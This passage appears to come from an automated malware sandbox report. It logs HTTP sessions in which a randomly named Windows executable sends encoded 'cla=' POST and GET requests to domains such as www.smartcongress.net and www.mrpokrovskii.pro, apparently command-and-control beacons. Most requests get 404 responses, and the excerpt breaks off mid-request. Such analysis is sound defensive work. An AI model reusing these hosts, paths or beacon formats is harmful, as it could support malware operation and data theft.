                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 41 62 6d 48 68 58 66 7a 57 34 4b 59 4c 47 44 51 63 78 4d 2b 6b 53 50 58 4b 74 2f 31 51 45 4e 31 49 50 65 42 70 47 5a 49 34 54 33 34 46 6d 54 46 41 6b 77 51 6b 77 4e 6c 41 5a 5a 77 31 67 74 55 6f 39 31 75 32 72 63 55 59 75 73 74 70 61 74 77 43 38 59 4c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cAbmHhXfzW4KYLGDQcxM+kSPXKt/1QEN1IPeBpGZI4T34FmTFAkwQkwNlAZZw1gtUo91u2rcUYustpatwC8YLg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                            Nov 22, 2024 07:55:53.295433044 CET951INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWMxYWRjNDEtYmUzZC00NzdkLWJlNWItZjVhNjA5ODc1ZTIzIiwicGFnZV90aW1lIjoxNzMyMjU4NT


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.549840146.88.233.115802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:59.618520021 CET619OUTPOST /11t3/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.smartcongress.net/11t3/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2f 71 30 59 75 31 47 42 4d 53 6f 6b 75 76 48 47 4b 6d 57 47 47 33 57 41 6b 37 71 2f 59 39 51 43 56 71 46 64 35 55 41 3d
                                                                                                            Data Ascii: cla=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm/q0Yu1GBMSokuvHGKmWGG3WAk7q/Y9QCVqFd5UA=
                                                                                                            Nov 22, 2024 07:56:01.130518913 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:00 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.549846146.88.233.115802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:02.335922956 CET639OUTPOST /11t3/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.smartcongress.net/11t3/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 36 34 30 6f 69 49 4a 4e 78 72 50 4a 56 74 6e 44 56 62 42 43 50 79 51 70 65 36 57 34 42 53 4d 61 6c 72 54 74 58 56
                                                                                                            Data Ascii: cla=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVX640oiIJNxrPJVtnDVbBCPyQpe6W4BSMalrTtXV
                                                                                                            Nov 22, 2024 07:56:03.594099998 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:03 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.549855146.88.233.115802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:04.998981953 CET1656OUTPOST /11t3/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.smartcongress.net/11t3/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 34 46 70 4d 50 6e 4b 56 65 6b 44 42 33 64 36 50 65 75 62 4a 78 46 43 4b 78 65 76 45 73 31 4a 78 48 61 61 70 32 63 43 34 59 41 55 2f 39 72 56 6f 71 63 6e 4d 35 68 38 49 49 42 64 2b 52 2f 74 34 4e 59 67 30 52 45 37 4f 51 66 65 4c 39 57 76 39 4f 61 6a 36 62 41 6b 47 34 56 61 6c 71 30 37 58 33 33 55 6e 38 72 31 6b 72 31 4b 2b 6b 77 67 44 44 59 48 54 44 55 4a 74 6e 6f 41 32 75 42 2f 4c 70 34 78 69 70 50 38 4d 69 50 4e 76 4e 36 62 63 70 47 6a 35 70 74 43 72 79 50 46 37 44 7a 6f 57 6b 38 6c 45 [TRUNCATED]
                                                                                                            Data Ascii: cla=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PU8pYUPdn448lgyIIhjQDohEmSCHQoPkYDrwAO7B2U6gJI7UxPnLLFOxGkvahV9DXaOZD7SUp8MI4M1fbhN8zs1W5ITgR0vr0/Av+bSqKCb1jmAr+tKxvONy7Uy0U3ha04FpMPnKVekDB3d6PeubJxFCKxevEs1JxHaap2cC4YAU/9rVoqcnM5h8IIBd+R/t4NYg0RE7OQfeL9Wv9Oaj6bAkG4Valq07X33Un8r1kr1K+kwgDDYHTDUJtnoA2uB/Lp4xipP8MiPNvN6bcpGj5ptCryPF7DzoWk8lE6FVd7yEX8F8nupG2UeCZG+fleAO1HcN9QYOk9CEjZs0ha+QEL7euE3gm46uVbXLAGB9+2MZYll+1HWXLX7n4zRA2QuNmt5UahrNy45avU2JQat6OnGD6o0J4BsGfhFMgcP8ArFwzuPCnhi6I9JqTjMKt22nzvjAKInBqFKN9Cy8ryQcHqfcdKJuUtiJsNGb+GF3MpSX3YmSXoXRoe+CYJeWewX2h6W4146TKSoKG/0A4/rH3x6C4wzWUV723iy4smJZC1ZWf9m67G0+Fn7hVWIoIMX+xd/wcEfbuJMRHzJOwxBDZ9e0PddZ1XMPxZdtT2xQ4Bn3qD3Ri2l4S4ILSvOF4h1rwcHw5Mc4GJmcbNBqOy2dLoVSEZ+Cpu/Rd3eMeN7Ww9heYoT8sINIwEnbP4VVI/6ebBFCIVZ8qslpPjIpD8gCy/oLJgqRHyhcIHaBWVtwVYhzW5p7OOlmQDIZUiOg/guQiUKt9T4NgbKQ1HTGRQtKGZOpLfF33ibzTI4sAgZ0bFe3jmWiYNkffOEkeilaaSCcCMy4FNa0F2lls75NWs0qpbrWaiqxeT/8yUGOBXwnjUMN7Gdfvtpo+RruMcDIp5nn5SklItsT4r2v8unij49kWv9WSu7ploAnx/EDPp/37UxX7pbUFODxKQFvGgzYVdoD0oo/gib [TRUNCATED]
                                                                                                            Nov 22, 2024 07:56:06.385685921 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:06 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.549862146.88.233.115802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:07.662118912 CET355OUTGET /11t3/?cla=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:56:09.016925097 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Fri, 22 Nov 2024 06:56:08 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.549879194.85.61.76802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:15.111445904 CET616OUTPOST /2pji/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6b 54 42 75 58 44 53 36 2b 69 65 32 56 4f 6b 53 35 33 4b 62 56 55 6b 4e 63 57 52 76 6e 4a 55 76 6a 63 6e 56 7a 63 41 3d
                                                                                                            Data Ascii: cla=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkTBuXDS6+ie2VOkS53KbVUkNcWRvnJUvjcnVzcA=
                                                                                                            Nov 22, 2024 07:56:16.488099098 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:16 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.549885194.85.61.76802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:17.774687052 CET636OUTPOST /2pji/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 49 31 4d 46 5a 59 32 35 31 47 35 2f 33 6c 74 4c 56 65 71 53 4d 53 43 34 49 46 6a 69 59 34 52 4c 33 66 44 66 41 73
                                                                                                            Data Ascii: cla=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0I1MFZY251G5/3ltLVeqSMSC4IFjiY4RL3fDfAs
                                                                                                            Nov 22, 2024 07:56:19.223676920 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.549891194.85.61.76802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:20.439014912 CET1653OUTPOST /2pji/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.mrpokrovskii.pro/2pji/
